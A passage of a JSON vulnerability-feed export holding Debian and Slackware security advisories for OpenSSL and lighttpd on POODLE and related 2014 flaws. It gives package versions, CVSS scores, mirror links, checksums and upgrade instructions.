text in as few as 256\n tries if they are able to force a victim application to repeatedly send\n the same data over newly created SSL 3.0 connections. \n\n This update adds support for Fallback SCSV to mitigate this issue.\n\nCVE-2014-3567\n\n A memory leak flaw was found in the way an OpenSSL handled failed\n session ticket integrity checks. A remote attacker could exhaust all\n available memory of an SSL/TLS or DTLS server by sending a large number\n of invalid session tickets to that server. \n\nCVE-2014-3568\n\n When OpenSSL is configured with &quot;no-ssl3&quot; as a build option, servers\n could accept and complete a SSL 3.0 handshake, and clients could be\n configured to send them.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.0.1e-2+deb7u13.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.0.1j-1.\n\nWe recommend that you upgrade your openssl packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "reporter": "Debian", "published": "2014-10-16T15:48:46", "title": "[SECURITY] [DSA 3053-1] openssl security update", "type": "debian", "enchantments": {"score": {"modified": "2018-10-18T13:49:11", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2014-10-16T15:48:46", "id": "DEBIAN:DSA-3053-1:A743E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00239.html", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-10-16T22:14:19", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "6", "packageVersion": "0.9.8o-4squeeze18", "arch": "all", "packageFilename": "libssl-dev_0.9.8o-4squeeze18_all.deb", "packageName": "libssl-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "0.9.8o-4squeeze18", "arch": "all", "packageFilename": "libcrypto0.9.8-udeb_0.9.8o-4squeeze18_all.deb", "packageName": "libcrypto0.9.8-udeb", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "0.9.8o-4squeeze18", "arch": "all", "packageFilename": "libssl0.9.8_0.9.8o-4squeeze18_all.deb", "packageName": "libssl0.9.8", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "0.9.8o-4squeeze18", "arch": "all", "packageFilename": "libssl0.9.8-dbg_0.9.8o-4squeeze18_all.deb", "packageName": "libssl0.9.8-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "0.9.8o-4squeeze18", "arch": "all", "packageFilename": "openssl_0.9.8o-4squeeze18_all.deb", "packageName": "openssl", "operator": "lt"}], "description": "Package : openssl\nVersion : 0.9.8o-4squeeze18\nCVE ID : CVE-2014-3567 CVE-2014-3568 CVE-2014-3569\n\nSeveral vulnerabilities have been found in OpenSSL.\n\nCVE-2014-3566 (&quot;POODLE&quot;)\n\n A flaw was found in the way SSL 3.0 handled padding bytes when\n decrypting messages encrypted using block ciphers in cipher block\n chaining (CBC) mode. This flaw allows a man-in-the-middle (MITM)\n attacker to decrypt a selected byte of a cipher text in as few as 256\n tries if they are able to force a victim application to repeatedly\n send the same data over newly created SSL 3.0 connections. \n\n This update adds support for Fallback SCSV to mitigate this issue.\n This does not fix the issue. The proper way to fix this is to\n disable SSL 3.0.\n\nCVE-2014-3567\n\n A memory leak flaw was found in the way an OpenSSL handled failed\n session ticket integrity checks. A remote attacker could exhaust all\n available memory of an SSL/TLS or DTLS server by sending a large number\n of invalid session tickets to that server.\n\nCVE-2014-3568\n\n When OpenSSL is configured with &quot;no-ssl3&quot; as a build option, servers\n could accept and complete a SSL 3.0 handshake, and clients could be\n configured to send them.\n\n Note that the package is Debian is not build with this option.\n\nCVE-2014-3569\n\n When openssl is build with the no-ssl3 option and a SSL v3 Client\n Hello is received the ssl method would be set to NULL which could\n later result in a NULL pointer dereference.\n\n Note that the package is Debian is not build with this option.\n\n", "edition": 1, "reporter": "Debian", "published": "2014-11-01T15:50:03", "title": "[SECURITY] [DLA 81-1] openssl security update", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:19", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3567", "CVE-2014-3568", "CVE-2014-3569"], "modified": "2014-11-01T15:50:03", "id": "DEBIAN:DLA-81-1:C60A9", "href": "https://lists.debian.org/debian-lts-announce/2014/debian-lts-announce-201411/msg00000.html", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-10-16T22:14:48", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.28-2+squeeze1.7", "arch": "all", "packageFilename": "lighttpd-mod-webdav_1.4.28-2+squeeze1.7_all.deb", "packageName": "lighttpd-mod-webdav", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.28-2+squeeze1.7", "arch": "all", "packageFilename": "lighttpd-mod-mysql-vhost_1.4.28-2+squeeze1.7_all.deb", "packageName": "lighttpd-mod-mysql-vhost", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.28-2+squeeze1.7", "arch": "all", "packageFilename": "lighttpd-mod-magnet_1.4.28-2+squeeze1.7_all.deb", "packageName": "lighttpd-mod-magnet", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.28-2+squeeze1.7", "arch": "all", "packageFilename": "lighttpd_1.4.28-2+squeeze1.7_all.deb", "packageName": "lighttpd", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.28-2+squeeze1.7", "arch": "all", "packageFilename": "lighttpd-doc_1.4.28-2+squeeze1.7_all.deb", "packageName": "lighttpd-doc", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.28-2+squeeze1.7", "arch": "all", "packageFilename": "lighttpd-mod-trigger-b4-dl_1.4.28-2+squeeze1.7_all.deb", "packageName": "lighttpd-mod-trigger-b4-dl", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.28-2+squeeze1.7", "arch": "all", "packageFilename": "lighttpd-mod-cml_1.4.28-2+squeeze1.7_all.deb", "packageName": "lighttpd-mod-cml", "operator": "lt"}], "description": "Package : lighttpd\nVersion : 1.4.28-2+squeeze1.7\nCVE ID : CVE-2014-3566\nDebian Bug : #765702\n\nThis update allows to disable SSLv3 in lighttpd in order to protect\nagainst the POODLE attack. SSLv3 is now disabled by default and can be\nreenabled (if needed) using the ssl.use-sslv3 option.\n", "edition": 1, "reporter": "Debian", "published": "2015-07-25T14:30:31", "title": "[SECURITY] [DLA 282-1] lighttpd security update", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:48", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "modified": "2015-07-25T14:30:31", "id": "DEBIAN:DLA-282-1:F03D5", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201507/msg00019.html", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-10-18T13:49:40", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "7", "packageVersion": "1.4.31-4+deb7u4", "arch": "all", "packageFilename": "lighttpd_1.4.31-4+deb7u4_all.deb", "packageName": "lighttpd", "operator": "lt"}], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3489-1 security@debian.org\nhttps://www.debian.org/security/ Sebastien Delafond\nFebruary 23, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : lighttpd\nCVE ID : CVE-2014-3566\nDebian Bug : 765702\n\nlighttpd, a small webserver, is vulnerable to the POODLE attack via\nthe use of SSLv3. This protocol is now disabled by default.\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 1.4.31-4+deb7u4.\n\nWe recommend that you upgrade your lighttpd packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "reporter": "Debian", "published": "2016-02-23T18:26:44", "title": "[SECURITY] [DSA 3489-1] lighttpd security update", "type": "debian", "enchantments": {"score": {"modified": "2018-10-18T13:49:40", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "modified": "2016-02-23T18:26:44", "id": "DEBIAN:DSA-3489-1:3D620", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00059.html", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "slackware": [{"lastseen": "2018-08-31T00:36:54", "references": [], "affectedPackage": [{"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "0.9.8zc", "arch": "x86_64", "packageFilename": "openssl-solibs-0.9.8zc-x86_64-1_slack13.1.txz", "packageName": "openssl-solibs", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "0.9.8zc", "arch": "i486", "packageFilename": "openssl-0.9.8zc-i486-1_slack13.1.txz", "packageName": "openssl", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "0.9.8zc", "arch": "x86_64", "packageFilename": "openssl-0.9.8zc-x86_64-1_slack13.0.txz", "packageName": "openssl", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.0", "packageVersion": "1.0.1j", "arch": "i486", "packageFilename": "openssl-1.0.1j-i486-1_slack14.0.txz", "packageName": "openssl", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.1", "packageVersion": "1.0.1j", "arch": "x86_64", "packageFilename": "openssl-1.0.1j-x86_64-1_slack14.1.txz", "packageName": "openssl", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.37", "packageVersion": "0.9.8zc", "arch": "x86_64", "packageFilename": "openssl-0.9.8zc-x86_64-1_slack13.37.txz", "packageName": "openssl", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.0", "packageVersion": "1.0.1j", "arch": "x86_64", "packageFilename": "openssl-solibs-1.0.1j-x86_64-1_slack14.0.txz", "packageName": "openssl-solibs", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "0.9.8zc", "arch": "x86_64", "packageFilename": "openssl-solibs-0.9.8zc-x86_64-1_slack13.0.txz", "packageName": "openssl-solibs", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.0", "packageVersion": "1.0.1j", "arch": "i486", "packageFilename": "openssl-solibs-1.0.1j-i486-1_slack14.0.txz", "packageName": "openssl-solibs", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "0.9.8zc", "arch": "x86_64", "packageFilename": "openssl-0.9.8zc-x86_64-1_slack13.1.txz", "packageName": "openssl", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "0.9.8zc", "arch": "i486", "packageFilename": "openssl-solibs-0.9.8zc-i486-1_slack13.0.txz", "packageName": "openssl-solibs", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.0", "packageVersion": "1.0.1j", "arch": "x86_64", "packageFilename": "openssl-1.0.1j-x86_64-1_slack14.0.txz", "packageName": "openssl", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "0.9.8zc", "arch": "i486", "packageFilename": "openssl-0.9.8zc-i486-1_slack13.0.txz", "packageName": "openssl", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.37", "packageVersion": "0.9.8zc", "arch": "i486", "packageFilename": "openssl-solibs-0.9.8zc-i486-1_slack13.37.txz", "packageName": "openssl-solibs", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.1", "packageVersion": "1.0.1j", "arch": "i486", "packageFilename": "openssl-1.0.1j-i486-1_slack14.1.txz", "packageName": "openssl", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.1", "packageVersion": "1.0.1j", "arch": "i486", "packageFilename": "openssl-solibs-1.0.1j-i486-1_slack14.1.txz", "packageName": "openssl-solibs", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.1", "packageVersion": "1.0.1j", "arch": "x86_64", "packageFilename": "openssl-solibs-1.0.1j-x86_64-1_slack14.1.txz", "packageName": "openssl-solibs", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.37", "packageVersion": "0.9.8zc", "arch": "i486", "packageFilename": "openssl-0.9.8zc-i486-1_slack13.37.txz", "packageName": "openssl", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.37", "packageVersion": "0.9.8zc", "arch": "x86_64", "packageFilename": "openssl-solibs-0.9.8zc-x86_64-1_slack13.37.txz", "packageName": "openssl-solibs", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "0.9.8zc", "arch": "i486", "packageFilename": "openssl-solibs-0.9.8zc-i486-1_slack13.1.txz", "packageName": "openssl-solibs", "operator": "lt"}], "description": "New openssl packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/openssl-solibs-1.0.1j-i486-1_slack14.1.txz: Upgraded.\n (* Security fix *)\npatches/packages/openssl-1.0.1j-i486-1_slack14.1.txz: Upgraded.\n This update fixes several security issues:\n SRTP Memory Leak (CVE-2014-3513):\n A flaw in the DTLS SRTP extension parsing code allows an attacker, who\n sends a carefully crafted handshake message, to cause OpenSSL to fail\n to free up to 64k of memory causing a memory leak. This could be\n exploited in a Denial Of Service attack.\n Session Ticket Memory Leak (CVE-2014-3567):\n When an OpenSSL SSL/TLS/DTLS server receives a session ticket the\n integrity of that ticket is first verified. In the event of a session\n ticket integrity check failing, OpenSSL will fail to free memory\n causing a memory leak. By sending a large number of invalid session\n tickets an attacker could exploit this issue in a Denial Of Service\n attack.\n SSL 3.0 Fallback protection:\n OpenSSL has added support for TLS_FALLBACK_SCSV to allow applications\n to block the ability for a MITM attacker to force a protocol\n downgrade.\n Some client applications (such as browsers) will reconnect using a\n downgraded protocol to work around interoperability bugs in older\n servers. This could be exploited by an active man-in-the-middle to\n downgrade connections to SSL 3.0 even if both sides of the connection\n support higher protocols. SSL 3.0 contains a number of weaknesses\n including POODLE (CVE-2014-3566).\n Build option no-ssl3 is incomplete (CVE-2014-3568):\n When OpenSSL is configured with &quot;no-ssl3&quot; as a build option, servers\n could accept and complete a SSL 3.0 handshake, and clients could be\n configured to send them.\n For more information, see:\n https://www.openssl.org/news/secadv_20141015.txt\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zc-i486-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zc-i486-1_slack13.0.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zc-x86_64-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zc-x86_64-1_slack13.0.txz\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zc-i486-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zc-i486-1_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zc-x86_64-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zc-x86_64-1_slack13.1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zc-i486-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zc-i486-1_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zc-x86_64-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zc-x86_64-1_slack13.37.txz\n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1j-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1j-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1j-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1j-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1j-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1j-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1j-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1j-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1j-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1j-i486-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1j-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1j-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 packages:\n44d336a121b39296f0e6bbeeb283dd2b openssl-0.9.8zc-i486-1_slack13.0.txz\n8342cfb351e59ecf5ea6d8cba66f0040 openssl-solibs-0.9.8zc-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\n671f12535bdc10ab24388b713351aca2 openssl-0.9.8zc-x86_64-1_slack13.0.txz\n21e380284cdfab2fd15fffe2e0aed526 openssl-solibs-0.9.8zc-x86_64-1_slack13.0.txz\n\nSlackware 13.1 packages:\n64cb819f1e07522bd5d7ceedd0a9ab50 openssl-0.9.8zc-i486-1_slack13.1.txz\n5fe4e385b2251cfd7e8ae5963ec6cef1 openssl-solibs-0.9.8zc-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\n94feb6699d6f2cc7750a6b2e17ccaaa2 openssl-0.9.8zc-x86_64-1_slack13.1.txz\n2c17e4286509c29074ab0168367b851e openssl-solibs-0.9.8zc-x86_64-1_slack13.1.txz\n\nSlackware 13.37 packages:\n4483d91c776c7e23c59246c4e0aa24aa openssl-0.9.8zc-i486-1_slack13.37.txz\nfedd58eb19bc13c9dd88d947827a7370 openssl-solibs-0.9.8zc-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\n5d48ac1e9339efc35e304c7d48b2e762 openssl-0.9.8zc-x86_64-1_slack13.37.txz\n6f5e2b576259477c13f12cbed9be8804 openssl-solibs-0.9.8zc-x86_64-1_slack13.37.txz\n\nSlackware 14.0 packages:\n2b678160283bc696565dc8bd8b28c0eb openssl-1.0.1j-i486-1_slack14.0.txz\nf7762615c990713e9e86d4da962f1022 openssl-solibs-1.0.1j-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\n41010ca37d49b74e7d7dc3f1c6ddc57e openssl-1.0.1j-x86_64-1_slack14.0.txz\n40dc6f3de217279d6140c1efcc0d45c8 openssl-solibs-1.0.1j-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n024ecea55e22e47f9fbb4b81a7b72a51 openssl-1.0.1j-i486-1_slack14.1.txz\n0a575668bb41ec4c2160800611f7f627 openssl-solibs-1.0.1j-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\nd07fe289f7998a584c2b0d9810a8b9aa openssl-1.0.1j-x86_64-1_slack14.1.txz\n1ffc5d0c02b0c60cefa5cf9189bfc71d openssl-solibs-1.0.1j-x86_64-1_slack14.1.txz\n\nSlackware -current packages:\n53c9f51a79460bbfc5dec5720317cd53 a/openssl-solibs-1.0.1j-i486-1.txz\ncc059aa63494f3b005a886c70bc3f5d6 n/openssl-1.0.1j-i486-1.txz\n\nSlackware x86_64 -current packages:\n500709555e652adcd84b4e02dfab4eeb a/openssl-solibs-1.0.1j-x86_64-1.txz\nc483ca9c450fa90a901ac013276ccc53 n/openssl-1.0.1j-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg openssl-1.0.1j-i486-1_slack14.1.txz openssl-solibs-1.0.1j-i486-1_slack14.1.txz", "edition": 3, "reporter": "Slackware Linux Project", "published": "2014-10-15T10:58:22", "title": "openssl", "type": "slackware", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2014-10-15T10:58:22", "id": "SSA-2014-288-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.846452", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:54", "references": [], "description": "\r\n\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[slackware-security] openssl &#40;SSA:2014-288-01&#41;\r\n\r\nNew openssl packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\r\nand -current to fix security issues.\r\n\r\n\r\nHere are the details from the Slackware 14.1 ChangeLog:\r\n+--------------------------+\r\npatches/packages/openssl-solibs-1.0.1j-i486-1_slack14.1.txz: Upgraded.\r\n &#40;* Security fix *&#41;\r\npatches/packages/openssl-1.0.1j-i486-1_slack14.1.txz: Upgraded.\r\n This update fixes several security issues:\r\n SRTP Memory Leak &#40;CVE-2014-3513&#41;:\r\n A flaw in the DTLS SRTP extension parsing code allows an attacker, who\r\n sends a carefully crafted handshake message, to cause OpenSSL to fail\r\n to free up to 64k of memory causing a memory leak. This could be\r\n exploited in a Denial Of Service attack.\r\n Session Ticket Memory Leak &#40;CVE-2014-3567&#41;:\r\n When an OpenSSL SSL/TLS/DTLS server receives a session ticket the\r\n integrity of that ticket is first verified. In the event of a session\r\n ticket integrity check failing, OpenSSL will fail to free memory\r\n causing a memory leak. By sending a large number of invalid session\r\n tickets an attacker could exploit this issue in a Denial Of Service\r\n attack.\r\n SSL 3.0 Fallback protection:\r\n OpenSSL has added support for TLS_FALLBACK_SCSV to allow applications\r\n to block the ability for a MITM attacker to force a protocol\r\n downgrade.\r\n Some client applications &#40;such as browsers&#41; will reconnect using a\r\n downgraded protocol to work around interoperability bugs in older\r\n servers. This could be exploited by an active man-in-the-middle to\r\n downgrade connections to SSL 3.0 even if both sides of the connection\r\n support higher protocols. SSL 3.0 contains a number of weaknesses\r\n including POODLE &#40;CVE-2014-3566&#41;.\r\n Build option no-ssl3 is incomplete &#40;CVE-2014-3568&#41;:\r\n When OpenSSL is configured with &quot;no-ssl3&quot; as a build option, servers\r\n could accept and complete a SSL 3.0 handshake, and clients could be\r\n configured to send them.\r\n For more information, see:\r\n https://www.openssl.org/news/secadv_20141015.txt\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568\r\n &#40;* Security fix *&#41;\r\n+--------------------------+\r\n\r\n\r\nWhere to find the new packages:\r\n+-----------------------------+\r\n\r\nThanks to the friendly folks at the OSU Open Source Lab\r\n&#40;http://osuosl.org&#41; for donating FTP and rsync hosting\r\nto the Slackware project! \r\n\r\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\r\nadditional mirror sites near you.\r\n\r\nUpdated packages for Slackware 13.0:\r\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zc-i486-1_slack13.0.txz\r\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zc-i486-1_slack13.0.txz\r\n\r\nUpdated packages for Slackware x86_64 13.0:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zc-x86_64-1_slack13.0.txz\r\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zc-x86_64-1_slack13.0.txz\r\n\r\nUpdated packages for Slackware 13.1:\r\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zc-i486-1_slack13.1.txz\r\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zc-i486-1_slack13.1.txz\r\n\r\nUpdated packages for Slackware x86_64 13.1:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zc-x86_64-1_slack13.1.txz\r\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zc-x86_64-1_slack13.1.txz\r\n\r\nUpdated packages for Slackware 13.37:\r\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zc-i486-1_slack13.37.txz\r\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zc-i486-1_slack13.37.txz\r\n\r\nUpdated packages for Slackware x86_64 13.37:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zc-x86_64-1_slack13.37.txz\r\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zc-x86_64-1_slack13.37.txz\r\n\r\nUpdated packages for Slackware 14.0:\r\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1j-i486-1_slack14.0.txz\r\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1j-i486-1_slack14.0.txz\r\n\r\nUpdated packages for Slackware x86_64 14.0:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1j-x86_64-1_slack14.0.txz\r\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1j-x86_64-1_slack14.0.txz\r\n\r\nUpdated packages for Slackware 14.1:\r\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1j-i486-1_slack14.1.txz\r\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1j-i486-1_slack14.1.txz\r\n\r\nUpdated packages for Slackware x86_64 14.1:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1j-x86_64-1_slack14.1.txz\r\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1j-x86_64-1_slack14.1.txz\r\n\r\nUpdated packages for Slackware -current:\r\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1j-i486-1.txz\r\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1j-i486-1.txz\r\n\r\nUpdated packages for Slackware x86_64 -current:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1j-x86_64-1.txz\r\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1j-x86_64-1.txz\r\n\r\n\r\nMD5 signatures:\r\n+-------------+\r\n\r\nSlackware 13.0 packages:\r\n44d336a121b39296f0e6bbeeb283dd2b openssl-0.9.8zc-i486-1_slack13.0.txz\r\n8342cfb351e59ecf5ea6d8cba66f0040 openssl-solibs-0.9.8zc-i486-1_slack13.0.txz\r\n\r\nSlackware x86_64 13.0 packages:\r\n671f12535bdc10ab24388b713351aca2 openssl-0.9.8zc-x86_64-1_slack13.0.txz\r\n21e380284cdfab2fd15fffe2e0aed526 openssl-solibs-0.9.8zc-x86_64-1_slack13.0.txz\r\n\r\nSlackware 13.1 packages:\r\n64cb819f1e07522bd5d7ceedd0a9ab50 